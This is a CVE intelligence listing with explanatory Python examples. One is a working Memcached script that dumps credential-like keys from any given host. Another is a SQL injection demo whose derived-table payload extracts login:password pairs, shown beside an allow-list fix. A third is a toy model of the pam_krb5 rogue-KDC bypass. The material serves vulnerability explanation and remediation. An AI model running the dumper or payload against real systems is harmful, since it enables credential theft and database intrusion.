Threat and Vulnerability Intelligence Database

CVE-2023-34830

Description: i-doit Open v24 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the timeout parameter on the login page.

CVSS: NONE (0.0)

EPSS Score: 0.08%

Source: CVE
December 6th, 2024

CVE-2023-34736

Description: Guantang Equipment Management System version 4.12 is vulnerable to Arbitrary File Upload.

CVSS: NONE (0.0)

EPSS Score: 0.11%

Source: CVE
December 6th, 2024

CVE-2023-34673

Description: Elenos ETG150 FM transmitter running on version 3.12 was discovered to be leaking SMTP credentials and other sensitive information by exploiting the publicly accessible Memcached service. The attack can occur over the public Internet in some cases.

CVSS: NONE (0.0)

EPSS Score: 0.13%

Source: CVE
December 6th, 2024
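The practical check for an exposure like the one described above is to ask the Memcached instance what it is holding. The script below is an added example, not code from the advisory or from the vendor: it walks `stats items` to find populated slabs, lists keys in each slab with `stats cachedump`, fetches any key whose name looks credential-related, and returns what it found. The key names, values and the `find_exposed_secrets` / `socket_transport` helpers are constructed for the example; the sample responses are made up and are not captured from any real device.

```python
import re
import socket

# Constructed sample responses, keyed by the command that produced them.
# These are not captured from a real transmitter; they only exercise the parser.
FAKE_RESPONSES = {
    "stats items": "STAT items:3:number 2\r\nSTAT items:3:age 120\r\nEND\r\n",
    "stats cachedump 3 0": "ITEM smtp_password [11 b; 0 s]\r\nITEM smtp_host [16 b; 0 s]\r\nEND\r\n",
    "get smtp_password": "VALUE smtp_password 0 11\r\nhunter2-pwd\r\nEND\r\n",
    "get smtp_host": "VALUE smtp_host 0 16\r\nmail.example.com\r\nEND\r\n",
}


def fake_transport(command: str) -> str:
    """Offline transport used for the worked example and the test."""
    return FAKE_RESPONSES.get(command, "END\r\n")


def socket_transport(host: str, port: int = 11211, timeout: float = 3.0):
    """Real transport: one TCP connection per command, read until END/ERROR.
    A value that itself contains 'END\\r\\n' would cut the read short; acceptable
    for a quick exposure check, not for a faithful dump."""
    def send(command: str) -> str:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall((command + "\r\n").encode())
            buf = b""
            while not (buf.endswith(b"END\r\n") or buf.endswith(b"ERROR\r\n")):
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
            return buf.decode("utf-8", "replace")
    return send


SLAB_RE = re.compile(r"^STAT items:(\d+):number (\d+)", re.M)
ITEM_RE = re.compile(r"^ITEM (\S+) \[", re.M)
# Key names that suggest a credential or secret; extend to taste.
SENSITIVE_RE = re.compile(r"(smtp|pass|pwd|secret|token|api[_-]?key|cred)", re.I)


def list_slabs(send) -> list:
    """Slab classes that currently hold at least one item."""
    return [int(m.group(1)) for m in SLAB_RE.finditer(send("stats items"))
            if int(m.group(2)) > 0]


def list_keys(send, slab: int) -> list:
    """Key names in one slab. 'stats cachedump' is a legacy command and may be
    absent or capped on newer servers; 'lru_crawler metadump all' is the modern
    equivalent where available."""
    return ITEM_RE.findall(send(f"stats cachedump {slab} 0"))


def get_value(send, key: str):
    """Parse 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\nEND'. Byte length is
    applied to the decoded text, so non-ASCII values would be truncated."""
    resp = send(f"get {key}")
    m = re.match(r"VALUE \S+ \d+ (\d+)\r\n", resp)
    if not m:
        return None
    n = int(m.group(1))
    return resp[m.end():m.end() + n]


def find_exposed_secrets(send) -> dict:
    """Return {key: value} for every cached key whose name looks sensitive."""
    findings = {}
    for slab in list_slabs(send):
        for key in list_keys(send, slab):
            if SENSITIVE_RE.search(key):
                findings[key] = get_value(send, key)
    return findings


if __name__ == "__main__":
    import sys
    transport = socket_transport(sys.argv[1]) if len(sys.argv) > 1 else fake_transport
    for k, v in find_exposed_secrets(transport).items():
        print(f"{k} = {v!r}")
```

Any non-empty result from an Internet-facing instance is the finding; the fix on the operator side is to bind Memcached to localhost or otherwise firewall port 11211, since the protocol has no authentication of its own.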

CVE-2023-34672

Description: Improper Access Control allows adding a high-privilege user, affecting Elenos ETG150 FM transmitter running on version 3.12, by manipulating the user's role within the admin profile. An attack could occur over the public Internet in some cases.

CVSS: NONE (0.0)

EPSS Score: 0.15%

Source: CVE
December 6th, 2024

CVE-2023-34671

Description: Improper Access Control leads to privilege escalation, affecting Elenos ETG150 FM transmitter running on version 3.12, by manipulating the user's role in the user profile. An attack could occur over the public Internet in some cases.

CVSS: NONE (0.0)

EPSS Score: 0.15%

Source: CVE
December 6th, 2024

CVE-2023-34601

Description: Jeesite before commit 10742d3 was discovered to contain a SQL injection vulnerability via the component ${businessTable} at /act/ActDao.xml.

CVSS: NONE (0.0)

EPSS Score: 0.21%

Source: CVE
December 6th, 2024
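The `${businessTable}` reference is the tell in that description: in a MyBatis mapper, `#{name}` becomes a bound statement parameter, while `${name}` is substituted into the SQL text before the statement is prepared. A table name cannot be bound, which is why it ends up as text, and why the only sound defence is to validate it against a fixed list. The Python block below is an added example, not Jeesite's code: it reproduces the same splice with a string-formatted table name over an in-memory SQLite database, shows a derived-table payload that keeps the rest of the statement valid, and sits the allow-listed version beside it. The schema, table names, `PAYLOAD` and `ALLOWED_BUSINESS_TABLES` are all constructed for the example.

```python
import sqlite3

# Constructed allow-list of workflow tables the endpoint may legitimately query.
ALLOWED_BUSINESS_TABLES = {"leave_form", "expense_form"}


def setup_db() -> sqlite3.Connection:
    # Constructed schema (not Jeesite's): one workflow table plus a table the
    # attacker would like to read.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE leave_form (id TEXT, proc_ins_id TEXT, status TEXT);
        CREATE TABLE users (login_name TEXT, password TEXT);
        INSERT INTO leave_form VALUES ('1', 'proc-1', 'open');
        INSERT INTO users VALUES ('admin', 'hash-of-admin-password');
    """)
    return conn


def lookup_vulnerable(conn, business_table: str, proc_ins_id: str):
    # Mirrors MyBatis ${businessTable}: the table name is spliced into the SQL
    # text verbatim. Only proc_ins_id is a bound parameter, and binding one
    # value does not protect the rest of the statement.
    sql = f"SELECT id FROM {business_table} WHERE proc_ins_id = ?"
    return conn.execute(sql, (proc_ins_id,)).fetchall()


def lookup_hardened(conn, business_table: str, proc_ins_id: str):
    # Identifiers cannot be bound, so check the name against the allow-list and
    # quote it as an identifier; the row filter stays a bound parameter.
    if business_table not in ALLOWED_BUSINESS_TABLES:
        raise ValueError(f"business table not permitted: {business_table!r}")
    sql = f'SELECT id FROM "{business_table}" WHERE proc_ins_id = ?'
    return conn.execute(sql, (proc_ins_id,)).fetchall()


# Derived-table payload: the trailing "WHERE proc_ins_id = ?" stays syntactically
# valid (so parameter counts still match), but the source is now a query over
# a different table, with a column aliased to satisfy the outer filter.
PAYLOAD = "(SELECT login_name || ':' || password AS id, 'x' AS proc_ins_id FROM users)"


def demo() -> dict:
    conn = setup_db()
    try:
        blocked = lookup_hardened(conn, PAYLOAD, "x")
    except ValueError:
        blocked = "rejected"
    return {
        "legit": lookup_vulnerable(conn, "leave_form", "proc-1"),
        "injected": lookup_vulnerable(conn, PAYLOAD, "x"),
        "hardened_blocks": blocked,
        "hardened_legit": lookup_hardened(conn, "leave_form", "proc-1"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The same shape carries over to the mapper: keep `${businessTable}` only if the Java side has already checked the value against a closed set of table names, and never let it arrive from the request unchanged.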

CVE-2023-34464

Description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. From version 2.2.1 until versions 14.4.8, 14.10.5, and 15.1RC1 of org.xwiki.platform:xwiki-platform-web, and in any version prior to 14.4.8, 14.10.5, and 15.1RC1 of org.xwiki.platform:xwiki-platform-web-templates, any user who can edit a document in a wiki (such as their own user profile) can create a stored cross-site scripting attack. The attack occurs by putting plain HTML code into that document and then tricking another user into visiting that document with the `displaycontent` or `rendercontent` template and plain output syntax. If a user with programming rights is tricked into visiting such a URL, arbitrary actions can be performed with this user's rights, impacting the confidentiality, integrity, and availability of the whole XWiki installation. This has been patched in XWiki 14.4.8, 14.10.5 and 15.1RC1 by setting the content type of the response to plain text when the output syntax is not an HTML syntax.

CVSS: CRITICAL (9.1)

EPSS Score: 0.07%

Source: CVE
December 6th, 2024

CVE-2023-34145

Description: An untrusted search path vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to escalate their privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-34144.

CVSS: NONE (0.0)

EPSS Score: 0.09%

Source: CVE
December 6th, 2024

CVE-2023-34144

Description: An untrusted search path vulnerability in the Trend Micro Apex One and Apex One as a Service security agent could allow a local attacker to escalate their privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-34145.

CVSS: NONE (0.0)

EPSS Score: 0.09%

Source: CVE
December 6th, 2024

CVE-2023-3326

Description: pam_krb5 authenticates a user by essentially running kinit with the password, obtaining a ticket-granting ticket (TGT) from the Kerberos KDC (Key Distribution Center) over the network as a way to verify the password. However, if a keytab is not provisioned on the system, pam_krb5 has no way to validate the response from the KDC, and trusts the TGT provided over the network as being valid. In a non-default FreeBSD installation that leverages pam_krb5 for authentication and does not have a keytab provisioned, an attacker that is able to control both the password and the KDC responses can return a valid TGT, allowing authentication to occur for any user on the system.

CVSS: NONE (0.0)

EPSS Score: 0.26%

Source: CVE
December 6th, 2024
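The failure in that description is easier to see as a protocol exchange. The block below is an added toy model, not FreeBSD's pam_krb5 or any Kerberos library: "encryption" is reduced to an HMAC tag so that a blob only unseals under the key it was sealed with, which is the one property the argument needs. A `KDC` class answers AS and TGS requests from whatever keys it was built with, so an attacker who controls the network can stand up one with keys of their choosing. Because the client key is derived from the password, and the attacker is the one typing the password, the rogue KDC can always produce an AS-REP the client decrypts. What it cannot produce is a service ticket under the host key held in a keytab it never saw. All principal names, the realm salt and the key derivation are constructed for the example.

```python
import hashlib
import hmac
import secrets

REALM_SALT = b"EXAMPLE.ORG"  # constructed; real string2key salts per principal


def derive_key(password: str) -> bytes:
    # Toy string2key: the client key depends on the password alone, so whoever
    # chooses the password (here, the attacker) can compute it too.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), REALM_SALT, 10_000)


def seal(key: bytes, msg: bytes) -> bytes:
    # Toy "encryption": message plus HMAC tag. Confidentiality is ignored; what is
    # modelled is that unseal() fails under any key other than the sealing key.
    return msg + hmac.new(key, msg, "sha256").digest()


def unseal(key: bytes, blob: bytes) -> bytes:
    msg, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, msg, "sha256").digest()):
        raise ValueError("wrong key")
    return msg


class KDC:
    """Answers from whatever principal keys it was given. A rogue instance on an
    attacker-controlled network path is just another KDC with different keys."""

    def __init__(self, principal_keys: dict):
        self.keys = dict(principal_keys)
        self.keys.setdefault("krbtgt", secrets.token_bytes(32))

    def as_rep(self, user: str) -> bytes:
        session = secrets.token_bytes(16)
        tgt = seal(self.keys["krbtgt"], session + user.encode())
        # enc-part: session key plus TGT, sealed under the user's long-term key
        return seal(self.keys[user], session + tgt)

    def tgs_rep(self, tgt: bytes, service: str) -> bytes:
        payload = unseal(self.keys["krbtgt"], tgt)
        session = payload[:16]
        # service ticket, sealed under the service principal's key
        return seal(self.keys[service], session + service.encode())


def pam_krb5_authenticate(user: str, password: str, kdc: KDC,
                          host_keytab: bytes = None,
                          service: str = "host/box.example.org") -> bool:
    client_key = derive_key(password)
    try:
        enc_part = unseal(client_key, kdc.as_rep(user))
    except (ValueError, KeyError):
        return False  # AS-REP did not decrypt: wrong password (or unknown user)
    _session, tgt = enc_part[:16], enc_part[16:]
    if host_keytab is None:
        # The CVE-2023-3326 condition: nothing ties this TGT to the real KDC, so
        # a decryptable AS-REP is accepted as proof the password was right.
        return True
    try:
        ticket = kdc.tgs_rep(tgt, service)
        unseal(host_keytab, ticket)  # only the genuine KDC holds the host key
    except (ValueError, KeyError):
        return False
    return True


def simulate() -> dict:
    host_key = secrets.token_bytes(32)  # the keytab the real KDC shares with the host
    real_kdc = KDC({"alice": derive_key("correct horse"),
                    "host/box.example.org": host_key})
    # The attacker knows the password they will type and controls KDC responses.
    rogue_kdc = KDC({"alice": derive_key("attacker-chosen"),
                     "host/box.example.org": secrets.token_bytes(32)})
    return {
        "real_kdc_good_pw": pam_krb5_authenticate("alice", "correct horse", real_kdc, host_key),
        "real_kdc_bad_pw": pam_krb5_authenticate("alice", "wrong", real_kdc, host_key),
        "rogue_kdc_no_keytab": pam_krb5_authenticate("alice", "attacker-chosen", rogue_kdc),
        "rogue_kdc_with_keytab": pam_krb5_authenticate("alice", "attacker-chosen", rogue_kdc, host_key),
    }


if __name__ == "__main__":
    for scenario, accepted in simulate().items():
        print(f"{scenario}: {'accepted' if accepted else 'rejected'}")
```

The third scenario is the vulnerable one: with no keytab the rogue KDC's answer is accepted for any account name the attacker supplies. The fourth shows why provisioning a host keytab closes it, since the extra step of fetching and verifying a service ticket can only succeed against a KDC that shares the host's key.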